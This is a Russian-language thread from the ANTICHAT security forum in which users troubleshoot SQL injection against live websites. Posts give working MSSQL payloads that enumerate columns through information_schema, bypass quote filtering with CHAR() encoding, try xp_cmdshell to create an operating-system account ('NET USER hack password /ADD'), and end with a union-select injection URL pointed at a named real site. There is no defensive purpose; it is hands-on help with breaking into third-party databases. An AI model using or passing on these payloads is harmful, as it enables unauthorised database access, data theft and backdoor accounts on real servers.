ANTICHAT — форум по информационной безопасности, OSINT и технологиям

да либо не хватает прав либо не верно указан путь.

Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жес� �ь

дай урл, думаю многое станет ясным

Выше, с помощью запроса, который составил l1ght - получаешь первую колонку, а потом not in.

А ещё лучше - кинуть ссылку.

(select+top+1+column_name+from+information_schema. columns+where+table_name='users')--

Не работает )

ЗЫ: Не получается составить процедуру к БД =_=.

Типо такой:

xp_cmdshell [NET USER hack password /ADD]

1+and+1=(select+xp_cmdshell+[NET USER help password /ADD])--

Что-то вроде такоого ).Преобразовывал и в хекс,и в юрл, и наоборот.

А что пишет-то?
Хексил users без ковычки?

(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)+CHAR(115)+CHAR( 101)+CHAR(114)+CHAR(115))--
В гете нужно + на %2B менять
(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)%2BCHAR(115)%2BC HAR(101)%2BCHAR(114)%2BCHAR(115))--

__________________
<? Raz0r.name — блог о web-безопасности

Почему когда делаешь вот так -
то есть несуществующая колонка. Пишет, что колонки такой нет..
Потом когда подбираешь количество колонок
структура запроса уже другая и видно, что колонок вроде как 4.
Однако когда делаешь селект - то пишется, что The used SELECT statements have a different number of columns
Почему так?

попугай
http://www.forestforum.ru/index.php?page=-3+union+select+1,2,3,4,5,version()--

Там не один запрос